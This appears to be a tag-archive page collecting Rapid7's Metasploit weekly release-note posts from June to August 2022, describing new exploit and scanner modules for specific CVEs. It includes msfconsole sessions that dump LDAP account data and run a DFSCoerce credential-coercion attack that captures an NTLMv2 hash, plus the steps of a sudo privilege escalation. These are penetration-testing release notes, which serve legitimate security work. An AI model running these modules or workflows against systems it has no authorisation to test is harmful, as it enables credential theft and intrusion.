Tag Archives: Metasploit

Metasploit Weekly Wrap-Up

Post Syndicated from Shelby Pace original https://blog.rapid7.com/2022/08/05/metasploit-weekly-wrap-up-170/

Log4Shell in MobileIron Core

Metasploit Weekly Wrap-Up

Thanks to jbaines-r7 we have yet another Log4Shell exploit. Similar to the other Log4Shell exploit modules, the exploit works by sending a JNDI string that once received by the server will be deserialized, resulting in unauthenticated remote code execution as the tomcat user. Vulnerable versions of MobileIron Core have been reported as exploited in the wild.

VMware Workspace ONE Access LPE

Our very own Spencer McIntyre discovered and added a local privilege escalation module for CVE-2022-31660 in VMware Workspace ONE Access. By default, the horizon user has write permissions to the /opt/vmware/certproxy/bin/cert-proxy.sh script, and the sudo configuration does not require supplying a password when invoking the script. Due to this, an attacker can write arbitrary code to the /opt/vmware/certproxy/bin/cert-proxy.sh script and escalate their privileges to that of the root user by executing the certproxyService.sh with sudo. Because the horizon user runs the externally-facing web application in VMware Workspace ONE Access, CVE-2022-22954 can be leveraged for initial access to the target.

XML-RPC Unauthenticated RCE in Zoho Password Manager

Grant Willcox of the Metasploit team added a module that exploits a deserialization flaw in Zoho Password Manager Pro. Sending a single POST request containing XML-RPC data to the /xmlrpc endpoint will result in unauthenticated code execution as NT AUTHORITY\SYSTEM.

New module content (5)

  • Cisco PVC2300 POE Video Camera configuration download by Craig Heffner and Erik Wynter – This adds a module targeting Cisco PVC2300 IP Cameras that will download the configuration file using hard-coded credentials.
  • BACnet Scanner by Paz – This adds a new scanner module that discovers BACnet devices on the network and extracts model name, software version, firmware revision, and device description. Once the data is processed, it is displayed on screen and saved to a local xml file.
  • MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and rwincey, which exploits CVE-2021-44228 – This adds an exploit for MobileIron which is affected by the Log4Shell vulnerability. The result is an unauthenticated remote code execution in the context of the web application user.
  • VMware Workspace ONE Access CVE-2022-31660 by Spencer McIntyre, which exploits CVE-2022-31660 – This module exploits CVE-2022-31660, an LPE disclosed by VMware in VMSA-2022-0021. The underlying flaw is that the /opt/vmware/certproxy/bin/cert-proxy.sh script is writable by the horizon user who can also indirectly execute it by invoking the certproxyService.sh script via sudo which is permitted without a password, enabling escalation to root.
  • Zoho Password Manager Pro XML-RPC Java Deserialization by Grant Willcox, Vinicius, and Y4er, which exploits CVE-2022-35405 – This PR adds in an exploit module for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE as SYSTEM.

Enhancements and features (3)

  • #16833 from gwillcox-r7 – This PR adds an option to the host command to make it easier to delete host tags.
  • #16840 from bcoles – This replaces some Meterpreter-only method calls with method calls that check the session type, which allows non-Meterpreter sessions to use read_profile_list
    and load_missing_hives. Also, this changes read_profile_list to be able to read profile information for all accounts.
  • #16858 from adfoster-r7 – This updates ZeroLogon to have better error handling in the check method. This will cause the error from an invalid NetBIOS name to be reported with a meaningful message.

Bugs fixed (8)

  • #16820 from gwillcox-r7 – This PR fixes an issue in the ldap_query module where if the datastore option "action" wasn’t set the module would fail.
  • #16822 from adfoster-r7 – This fixes a bug in Rex::Ui::Text::Input::Buffer::BufferSock that was causing data to be occasionally lost due to the rsock monitor routine stopping abruptly.
  • #16825 from rbowes-r7 – The IMAP credential capture module did not appropriately handle literal strings as specified by RFC3501. The code has been updated to handle these strings efficiently.
  • #16832 from gwillcox-r7 – This fix removes an unnecessary echo statement from the ms10_092_schelevator module.
  • #16839 from bcoles – Fixes shell_registry_enumvals/getvaldata error checking.
  • #16844 from bcoles – This PR updates the post/multi/gather module to support non-meterpreter sessions like shell and powershell.
  • #16846 from jmartin-r7 – Updates auxiliary/scanner/ssh/ssh_login to gracefully handle Errno::EPIPE exceptions.
  • #16848 from jmartin-r7 – Fix a crash when updating session information in Meterpreter.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/07/29/metasploit-weekly-wrap-up-169/

Roxy-WI Unauthenticated RCE

Metasploit Weekly Wrap-Up

This week, community member Nuri Çilengir added an unauthenticated RCE for Roxy-WI. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. The vulnerability can be triggered by a specially crafted POST request to a Python script where the ipbackend parameter is vulnerable to OS command injection. The result is reliable code execution within the context of the web application user.

Fewer Meterpreter Scripts

Community member bcoles removed multiple Meterpreter scripts which have been deprecated for years. Metasploit’s documentation has omitted details on how to write them since 2014 and removing the existing ones in favor of their new post-module equivalents ensures users are using the most up-to-date code and workflows. Post modules have a number of advantages over Meterpreter scripts and Metasploit has equivalents for each of the Meterpreter scripts that were removed.

Helpful Suggestions

Msfconsole will now suggest datastore option names when an invalid option is specified. This should help users understand when they make a mistake and misspell an option name. The original behavior would just set the invalid option which may leave the user confused when they think they set one thing but the option did not actually change.

For example, prior to these changes setting LHSOT (instead of LHOST) the option would just be set, effectively not doing anything.

msf6 exploit(windows/smb/psexec) > set LHSOT 192.168.169.1
LHSOT => 192.168.169.1

Now the new behavior will identify that LHSOT is not valid in the current context and will suggest setting LHOST instead.

msf6 exploit(windows/smb/psexec) > set LHSOT 192.168.159.1
[-] Unknown datastore option: LHSOT. Did you mean LHOST?
msf6 exploit(windows/smb/psexec) >

New module content (1)

Enhancements and features (6)

  • #16774 from zeroSteiner – The set command has been updated so that if an invalid datastore option is provided, a suggestion will be made for a valid datastore option, where possible. Additionally, the behavior has been changed so that one can no longer set a datastore value that is not valid within the given content.
  • #16798 from bcoles – The deprecated scripts/meterpreter/pml_driver_config.rb script has been removed from Metasploit since Metasploit scripts have been deprecated for over 5 years now. Please use exploit/windows/local/service_permissions instead which contains a more modern implementation of the same principle this exploit utilized.
  • #16801 from bcoles – The deprecated scripts/meterpreter/schelevator.rb script has been removed in favor of exploit/windows/local/ms10_092_schelevator. Scripts were deprecated over 5 years ago and should no longer be used.
  • #16823 from bcoles – The deprecated scripts/meterpreter/prefetchtool.rb has been removed and replaced with the post/windows/gather/enum_prefetch.rb post module.
  • #16830 from bcoles – Remove deprecated scripts/meterpreter/getvncpw.rb script in favor of the post/windows/gather/credentials/vnc post module which is more modern and has more features.
  • #16831 from bcoles – Remove the deprecated scripts/meterpreter/get_env.rb in favor of the post/multi/gather/env post module.

Bugs fixed (6)

  • #16094 from 3V3RYONE – A bug has been fixed in the pg_ctl.rb helper whereby it was possible that initializing and starting databases using msfdb init might fail due to the pg_ctl.rb helper not properly setting unix_socket_directories to a path that a non-root user can write to. This code has now been updated so that it will set the unix_socket_directories setting to a path that the current user can write to or will error out if it cannot find a writeable directory to use for the socket file.
  • #16668 from sempervictus – A bug has been fixed in the HTTP crawler module and its associated library whereby the code expected an object to be populated when it may not be. This has been fixed with additional validation.
  • #16810 from entity0xfe – The host command has been updated to fix a bug whereby the -t flag was not properly accepting the <tag> parameter that it was supposed to accept and process. Additionally, the documentation for this option has been updated to be clearer.
  • #16817 from jmartin-r7 – Several modules and libraries were previously calling Msf::Config.get_config_root which did not properly account for changes to the configuration path that the user might make. These calls have been replaced with calls to Msf::Config.config_directory which will appropriately take the user’s configuration settings into account.
  • #16819 from adfoster-r7 – A bug has been fixed whereby running the hosts command with the -c flag to filter by columns would result in a stack trace. The command now correctly returns the output with only the columns specified to the -c flag.
  • #16824 from bcoles – A bug has been fixed in the is_admin? and is_system? post exploitation methods, which previously incorrectly reported the user as always being an administrator and a system user respectively when run on shell sessions.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/07/22/metasploit-weekly-wrap-up-167/

The past, present and future of Metasploit

Metasploit Weekly Wrap-Up

Don’t miss Spencer McIntyre’s talk on the Help Net Security’s blog. Spencer is the Lead Security Researcher at Rapid7 and speaks about how Metasploit has evolved since its creation back in 2003. He also explains how the Framework is addressing today’s offensive security challenges and how important is the partnership with the community.

LDAP swiss army knife

This week, our very own @gwillcox-r7 added an auxiliary module that will likely help you to dump useful information from LDAP servers. This module allows you to remotely retrieve data using either your own custom query or a set of LDAP queries under a specific category. In addition to the available predefined queries, the user can also provide a JSON or YAML file containing custom queries to be executed.

Here are the available predefined queries:

msf6 auxiliary(gather/ldap_query) > show actions

Auxiliary actions:

   Name                      Description
   ----                      -----------
   ENUM_ACCOUNTS             Dump info about all known user accounts in the domain.
   ENUM_ALL_OBJECT_CATEGORY  Dump all objects containing any objectCategory field.
   ENUM_ALL_OBJECT_CLASS     Dump all objects containing any objectClass field.
   ENUM_COMPUTERS            Dump all objects containing an objectCategory of Computer.
   ENUM_DOMAIN_CONTROLLERS   Dump all known domain controllers.
   ENUM_EXCHANGE_RECIPIENTS  Dump info about all known Exchange recipients.
   ENUM_EXCHANGE_SERVERS     Dump info about all known Exchange servers.
   ENUM_GROUPS               Dump info about all known groups in the LDAP environment.
   ENUM_ORGROLES             Dump info about all known organizational roles in the LDAP environment.
   ENUM_ORGUNITS             Dump info about all known organization units in the LDAP environment.
   RUN_QUERY_FILE            Execute a custom set of LDAP queries from the JSON or YAML file specified by QUERY_FILE.
   RUN_SINGLE_QUERY          Execute a single LDAP query using the QUERY_FILTER and QUERY_ATTRIBUTES options.

Here is how you can dump information about users in a Windows domain:

msf6 auxiliary(gather/ldap_query) > set action ENUM_ACCOUNTS
action => ENUM_ACCOUNTS
msf6 auxiliary(gather/ldap_query) > run RHOSTS=10.0.0.33 BIND_DN=MYDOMAIN\\Administrator BIND_PW=123456
[*] Running module against 10.0.0.33

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 10.0.0.33:389 Discovered base DN: DC=mydomain,DC=local
[*] CN=DC02 OU=Domain Controllers DC=mydomain DC=local
===============================================

 Name                Attributes
 ----                ----------
 displayname         DC02$
 name                DC02
 samaccountname      DC02$
 useraccountcontrol  532480

[*] CN=Administrator CN=Users DC=mylab DC=local
===========================================

 Name                Attributes
 ----                ----------
 name                Administrator
 samaccountname      Administrator
 useraccountcontrol  512

 ...[SNIP]...

Win2k summer clean up

For those nostalgic about old Windows systems, bcoles did a great cleanup of old modules targeting Win2k. He breathed life back into modules such as ms01_023_printer, ms02_065_msadc and ms03_007_ntdll_webdav by fixing many issues and adding offsets to support many more Win2k flavors.

New module content (1)

  • LDAP Query and Enumeration Module by Grant Willcox – This adds a generic module to perform LDAP queries. Users can execute custom queries either through configuration files on disk, or through a combination of datastore options. The module also includes multiple builtin queries for common operations.

Enhancements and features (7)

  • #16737 from adfoster-r7 – This removes the code duplication in the MSSQL client mixins and refactors the code into a single main mixin.
  • #16754 from bcoles – Adds additional offsets for various Windows 2000 Professional targets in the ms02_065_msadc module. Also adds documentation and notes.
  • #16761 from bcoles – Adds additional offsets for various Windows 2000 targets, replaces raw socket TCP with HttpClient, fixes default payload, adds docs and notes.
  • #16776 from bcoles – Adds a ftp-http command stager for FTP clients which support http(s) URLs via set cmdstager::flavor ftp_http.
  • #16778 from bcoles – The checkvm script at ./scripts/meterpreter/checkvm.rb has been removed and post/windows/gather/checkvm.rb now replaces it. Additionally, the post/windows/gather/checkvm.rb script has been updated to include missing features from ./scripts/meterpreter/checkvm.rb to ensure backwards compatibility.
  • #16789 from adfoster-r7 – This adds OpenSSL version information to the report generated by the debug command.
  • #16792 from adfoster-r7 – This improves support for various OpenSSL 3 related errors during console start.

Bugs fixed (2)

  • #16743 from adfoster-r7 – Fixes a crash when using the scanner/mssql/mssql_login module with the tdsencryption and USE_WINDOWS_AUTHENT options set to true.
  • #16753 from bcoles – This PR fixes several bugs present in the module, including shifting from Meterpreter to shell payloads, better checking, and added targets anddocumentation.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/07/15/metasploit-weekly-wrap-up-166/

JBOSS EAP/AS – More Deserializations? Indeed!

Metasploit Weekly Wrap-Up

Community contributor Heyder Andrade added in a new module for a Java deserialization vulnerability in JBOSS EAP/AS Remoting Unified Invoker interface for versions 6.1.0 and prior. As far as we can tell this was first disclosed by Joao Matos in his paper at AlligatorCon. Later a PoC from Marcio Almeida came out that Heyder Andrade used as the basis for his Metasploit module. The exploit allows an unauthenticated attacker with network access to JBOSS EAP/AS <= 6.1.0 Remoting Unified Invoker interface to gain RCE as the user jboss by sending a crafted serialized object to this interface.

Deserialization attacks have certainly been quite popular as of late but we haven’t seen many in JBOSS lately so we appreciate the efforts of these contributors to provide us with some alternative deserialization attacks 🙂

More Unauthenticated RCEs – Sourcegraph gitserver sshCommand RCE

One unauthenticated RCE is nice for a weekly wrapup, but we can always do better. Why not make it two this week? Courtesy of Spencer McIntyre and Altelus1‘s PoC, we now have a Metasploit module for CVE-2022-23642, an unauthenticated RCE in Sourcegraph Gitserver prior to 3.37.0 that allows attackers to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. Successful exploitation will allow an unauthenticated attacker to execute commands in the context of the Sourcegraph Gitserver server.

This is another cool attack, as we don’t often see these types of configuration-related issues leading to unauthenticated RCE; typically when they do crop up, there are limitations on what one can do. However in this case we ended up with a full RCE as an unauthenticated user, which goes to show that even less common or more frequently overlooked issues under the right scenario can be exploited to gain privileged access.

Decrypting Ya Secrets – Citrix Netscaler Secrets Decrypter

Finally, community contributor npm-cesium137-io added a new module to decrypt Citrix Netscaler appliance configuration files and recover secrets encrypted with the KEK encryption scheme, provided you have the key fragment files.

We have heard both from npm-cesium137-io and others that Citrix Netscaler has been seen on a number of pen testing engagements so hopefully this module should assist those pen testing these environments by allowing them to more easily obtain secrets during their engagements.

New module content (3)

Enhancements and features (2)

  • #16735 from ErikWynter – This change sets the MeterpreterTryToFork advanced payload option to true by default for the Linux target in the aerohive_netconfig_lfi_log_poison_rce module to prevent the application from hanging once exploited.
  • #16764 from bcoles – Adds two new HTTP client evasion options to msfconsole HTTP::shuffle_get_params, and HTTP::shuffle_post_params that allow users to randomize the order of the POST and GET parameters to evade static signatures.

Bugs fixed (5)

  • #16617 from NikitaKovaljov – This fixes a race condition that was present in the ipv6_neighbor module that caused hosts to be missed when the scanned range was very short due to an adaptive timeout with an insufficient floor value.
  • #16703 from e2002e – This fixes compatibility issues with the Censys V2 API and the censys_search.rb module.
  • #16718 from cdelafuente-r7 – This fixes the run_as library and module to work correctly on 64-bit systems.
  • #16727 from bcoles – Modules that use the tftp command stager fail due to a missing tftphost option. This ensures that the tftphost host is set and valid before proceeding with creating the command stager.
  • #16736 from ErikWynter – This change fixes a bug in the confluence_widget_connector exploit module to prevent it from crashing when the HTTP response body received in the get_java_property method is empty or does not match expected regex.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/07/08/metasploit-weekly-wrap-up-165/

DFSCoerce – Distributing more than just files

Metasploit Weekly Wrap-Up

DFS (Distributed File System) is now distributing Net-NTLM credentials thanks to Spencer McIntyre with a new auxiliary/scanner/dcerpc/dfscoerce module that is similar to PetitPotam in how it functions. Note that unlike PetitPotam, this technique does require a normal domain user’s credentials to work.

The following shows the workflow for targeting a 64-bit Windows Server 2019 domain controller. Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine account:

msf6 > use auxiliary/server/capture/smb 
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/capture/smb) > 
[*] Server is running. Listening on 0.0.0.0:445
[*] Server started.
msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
RHOSTS => 192.168.159.96
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
[*] 192.168.159.96:445    - Binding to \netdfs...
[+] 192.168.159.96:445    - Bound to \netdfs
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.250.237
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/dfscoerce) >

FreeSwitch Brute Force Login

A returning contributor krastanoel has brought us a module for brute forcing the login credential for the FreeSWITCH event socket service.
This is even simpler to use than our usual login scanner modules since there’s no need to determine or brute force a username — only the password is required!

New module content (2)

  • DFSCoerce by Spencer McIntyre, Wh04m1001, and xct_de – This adds a scanner module that implements the dfscoerce technique. Although this technique leverages MS-DFSNM methods, this module works similarly to PetitPotam in that it coerces authentication attempts to other machines over SMB. This ability to coerce authentication attempts makes it particularly useful in NTLM relay attacks.
  • FreeSWITCH Event Socket Login by krastanoel – This adds an auxiliary scanner module that brute forces the FreeSwitch’s event socket service login interface to guess the password.

Enhancements and features (1)

  • #16716 from bcoles – This updates HTTP Command stagers to expose the CMDSTAGER::URIPATH option, so users can choose where to host the payload when using a command stager.

Bugs fixed (3)

  • #16704 from gwillcox-r7 – This fixes an issue when targeting some faulty memcached servers that return an error when extracting the keys and values stored in slabs. The module no longer errors out with a type conversion error.
  • #16724 from bcoles – This updates and fixes the exploit/windows/iis/ms01_026_dbldecode module. It now uses the standard HttpClient, the TFTP stager has been fixed, and Meterpreter specific code has been removed since Meterpreter is not available on Server 2000 systems since Metasploit v6.
  • #16731 from space-r7 – Fixes a logic bug in the process API that would cause additional permissions to be requested than what was intended.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/07/01/metasploit-weekly-wrap-up-164/

SAMR Auxiliary Module

Metasploit Weekly Wrap-Up

A new SAMR auxiliary module has been added that allows users to add, lookup, and delete computer accounts from an AD domain. This should be useful for pentesters on engagements who need to create an AD account to gain an initial foothold into the domain for lateral movement attacks, or who need to use this functionality as an attack primitive.

Note when using this module that there is a standard number of computers a user can add, so be wary that you may get STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED error messages if you try to run this repeatedly. It should also be noted that whilst a standard user can create a computer account, you will need additional privileges to delete that account.

A Pesky Table Bug Gets Squashed

A well known bug in Rex-Tables when trying to render tables which contain unsupported characters has now been fixed in Rex-Text 0.2.38, which has now been pulled into the framework. This should solve a number of issues that have been reported over the last year such as https://github.com/rapid7/metasploit-framework/issues/15833, https://github.com/rapid7/metasploit-framework/issues/14955, and https://github.com/rapid7/metasploit-framework/issues/15044. It should also help improve experiences with some of the new LDAP work we have been working on lately, so that users should have a smoother experience once that releases.

PHP Mailer Argument Injection Module Improvements

As a final point of note, community contributor erikbomb has improved the PHP Mailer Argument Injection exploit targeting CVE-2016-10033 and CVE-2016-10045 to now support changing the name of the fields for the name, email, and message objects. This should allow this exploit to work under additional scenarios where these settings may need to be altered for the exploit to successfully run. Much thanks to erikbomb for these enhancements!

New module content (1)

  • SAMR Computer Management by JaGoTu and Spencer McIntyre – This adds an auxiliary module that can be used to add, lookup, and delete computer accounts from an active directory domain. The computer account can offer a sort of foothold into the domain for lateral movements or as a common attack primitive.

Enhancements and features (1)

  • #16721 from erikbomb – This updates the PHP Mailer Argument Injection exploit to allow setting the names of certain fields via advanced options. These configuration options then allow the exploit to work in additional scenarios.

Bugs fixed (2)

  • #16722 from bcoles – Fixes module metadata for stability and reliability.
  • #16729 from gwillcox-r7 – Fixes a crash in Metasploit’s console when trying to render tables which contain unsupported characters.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Erran Carey original https://blog.rapid7.com/2022/06/24/metasploit-weekly-wrap-up-163/

Add Windows target support for the Confluence OGNL injection module

Metasploit Weekly Wrap-Up

Improve the exploit/multi/http/atlassian_confluence_namespace_ognl_injection module to support Windows server targets.

EfsPotato – 6th getsystem technique

This adds the EfsPotato technique to the getsystem command in meterpreter. The new technique leverages the EFSRPC API to elevate a user if they have SeImpersonatePrivilege permissions enabled.

New module content (1)

  • #16676 from cdelafuente-r7 – Adds a new getsystem technique that leverages the EFSRPC API to elevate a user with the SeImpersonatePrivilege permission to NT AUTHORITY\SYSTEM. This technique is often referred to as "EfsPotato". It also improves the post module to use ACTIONS instead of the datastore TECHNIQUE for a simpler user interface when using info or show actions for this module, allowing a user to determine which techniques were available from inside msfconsole.

Enhancements and features (2)

  • #16650 from red0xff – This PR implements the method #read_from_file for PostgreSQL and MSSQL, and fixes the MySQL implementation. It also updates the test module to better handle multiline data returned from SQL queries.
  • #16692 from noraj – Updates various links to https://docs.metasploit.com

Bugs fixed (2)

  • #16597 from zeroSteiner – This fixes an issue with the encrypted shell payload stage that prevented it from being used with the new Powershell command adapter. In addition to this, a number of payload modules have been updated to include an opts hash as a parameter for compatibility.
  • #16680 from zeroSteiner – This PR adds support for Windows targets to the atlassian_confluence_namespace_ognl_injection module and fixes an issue where the check method would fail to properly identify that Windows targets were even vulnerable due to how the command was being executed.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/06/17/metasploit-weekly-wrap-up-162/

vCenter Secret Extracter

Metasploit Weekly Wrap-Up

Expanding on the work of the vcenter_forge_saml_token auxiliary module, community contributor npm-cesium137-io has added a new module for extracting the vmdir/vmafd certificates, the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated, from an offline copy of the services database. This information can then be used with the vcenter_forge_saml_token module to gain a session cookie that grants access to the SSO domain as a vSphere administrator.

Great work by npm-cesium137-io to complete this exploit chain and provide users a full end to end solution to get administrative level privileges on a vCenter/vSphere server given an offline copy of the services database!

Named Pipe Pivoting Documentation Updates

Historically speaking named pipe pivoting has been an area of much confusion among users. We have taken note of this and thanks to some help from adfoster-r7 and bwatters-r7, we have added in some documentation for using named pipe pivoting with Windows Meterpreter.

You can find this documentation online on our documentation site at https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html. Note that since with Metasploit 6.2 our documentation now lives inside of the Metasploit codebase, which you can find at docs/metasploit-framework.wiki/Pivoting-In-Metasploit.md.

Service Library Improvements

Community contributor kalidor noticed that whilst testing a few modules that the Windows Services library we maintain was in need of some updates and was erroring out for him in a number of cases. This turned out to be due to some inappropriately thrown exceptions. After further consultation it was decided a rewrite of the code was needed which not only solved the original issue but also aligned the Windows Services library to more closely align with existing design patterns, ensuring it will be easier to maintain long term.

New module content (1)

  • VMware vCenter Extract Secrets from vmdir / vmafd DB File by npm – This module extracts the vmdir / vmafd certificates from an offline copy of the service database (i.e. a vCenter backup). Right now it will pull the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated.

Enhancements and features (1)

  • #16654 from adfoster-r7 – This PR adds documentation for using named pipe pivoting with Windows Meterpreter.

Bugs fixed (3)

  • #16602 from kalidor – If a user restarted a service using lib/msf/core/post/windows/services.rb an exception would be thrown as a integer instead of as a string, which would cause an error to occur. This has been fixed by rewriting the code for the service_restart to use more appropriate logic. Additionally, the documentation has been updated for lib/msf/core/post/windows/services.rb to note which functions may throw exceptions.
  • #16627 from bwatters-r7 – The tools/modules/update_payload_cached_sizes.rb script has been updated to contain additional exception handling to appropriately handle any exceptions that may be thrown during runs, and then print out a list of those exceptions at the end of the run.
  • #16665 from adfoster-r7 – A missing import has been fixed in /tools/exploit/random_compile_c.rb, allowing it to now compile C files as expected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/

A Confluence of High-Profile Modules

Metasploit Weekly Wrap-Up

This release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the Windows Operating System accessible through malicious documents. Both have been all over the news, and we’re very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you’d like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 (AttackerKB, Rapid7 Blog)and Windows CVE-2022-30190 (AttackKB, Rapid7 Blog).

Metasploit 6.2

While we release new content weekly (or in real-time if you are using github), we track milestones as well. This week, we released Metasploit 6.2, and it has a whole host of new functionality, exploits, and fixes

New module content (2)

  • Atlassian Confluence Namespace OGNL Injection by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits CVE-2022-26134 – This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.
  • Microsoft Office Word MSDTJS by mekhalleh (RAMELLA Sébastien) and nao sec, which exploits CVE-2022-30190 – This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.

Enhancements and features (2)

  • #16651 from red0xff – The test_vulnerable methods in the various SQL injection libraries have been updated so that they will now use the specified encoder if one is specified, ensuring that characters are appropriately encoded as needed.
  • #16661 from dismantl – The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.

Bugs fixed (4)

  • #16615 from NikitaKovaljov – A bug has been fixed in the IPv6 library when creating solicited-multicast addresses by finding leading zeros in last 16 bits of link-local address and removing them.
  • #16630 from zeroSteiner – The auxiliary/server/capture/smb module no longer stores duplicate Net-NTLM hashes in the database.
  • #16643 from ojasookert – The exploits/multi/http/php_fpm_rce module has been updated to be compatible with Ruby 3.0 changes.
  • #16653 from adfoster-r7 – :
    This PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Announcing Metasploit 6.2

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/

Announcing Metasploit 6.2

Metasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we’ve added:

  • 138 new modules
  • 148 enhancements and features
  • 156 bug fixes

Top modules

Each week, the Metasploit team publishes a Metasploit wrap-up with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).

Remote Exploitation

  • VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits CVE-2021-44228: A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as root / SYSTEM. This exploit has been tested on both Windows and Linux targets.
  • F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388: This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the root user on affected systems.
